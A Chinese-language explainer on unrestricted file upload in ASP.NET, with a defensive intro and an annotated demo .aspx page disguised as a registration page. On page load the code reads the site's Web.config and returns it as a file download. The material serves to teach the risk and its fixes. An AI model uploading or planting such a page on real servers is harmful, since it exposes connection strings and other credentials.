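如果某个网站把上传的文件、图片直接存储到网站目录下,而且没有限制文件格式,那么攻击者可以上传一个 aspx 文件,然后直接在服务器上执行。下面的示例页面说明了这种风险:页面加载时在服务器端读取站点根目录下的 Web.config,并把内容作为附件返回。防御措施:对上传文件的扩展名做白名单校验,把上传文件存放到网站目录之外,或者对上传目录禁用脚本执行。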
<%@ Page Language="C#" ContentType="text/html" ResponseEncoding="gb2312" %>
<%@ Import Namespace="System.Text" %>
<%@ Import Namespace="System.IO"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>用户注册</title>
<script language="javascript">
</script>
<script language="c#" runat="server">
// Page-level field; it is never read or reassigned in the visible code.
string result="";
// Method executed on the server.
// Runs on every request to this page. It illustrates the impact of an upload
// feature that stores files inside a script-executable web directory without
// restricting the file type: once the server treats an uploaded .aspx as a page,
// the code below runs with the web application's own file-system permissions.
// Here it reads the site's Web.config and returns it to the requester as a download.
// Web.config typically holds connection strings and other application secrets,
// so its disclosure should be treated as a credential compromise.
// Defender notes: script files (.aspx) appearing under upload directories, and
// requests served from those directories, are the events to alert on; the durable
// fix is to keep uploads outside the web root or to disable script handlers there.
public void Page_Load(Object sender,EventArgs e)
{
// Opens <physical site root> + "Web.config" read-only. The plain concatenation
// presumably relies on MapPath("/") returning a path that ends with a separator.
using (FileStream fs = new FileStream(Server.MapPath("/")+"Web.config", FileMode.Open, FileAccess.Read))
{
// Buffer sized to the whole file; the file content is decoded as UTF-8 text.
byte[] buffer = new byte[fs.Length];
fs.Read(buffer, 0, buffer.Length);
string msg = System.Text.Encoding.UTF8.GetString(buffer);
//Response.Write(msg);
// timeNow is assigned but not used afterwards.
string timeNow = DateTime.Now.ToString();
// Discard any output buffered so far and switch to unbuffered output, so that
// only the file content is sent.
Response.Clear();
Response.Buffer = false;
// Mark the response as a binary attachment so the browser offers a download
// instead of rendering the content.
Response.ContentType = "application/octet-stream";
Response.AppendHeader("content-disposition", "attachment;filename=" + "Web" + ".config;");
Response.Write(msg);
Response.Flush();
// End() stops page processing here, so the HTML markup below is not sent.
Response.End();
}
}
</script>
</head>
<body>
</body>
</html>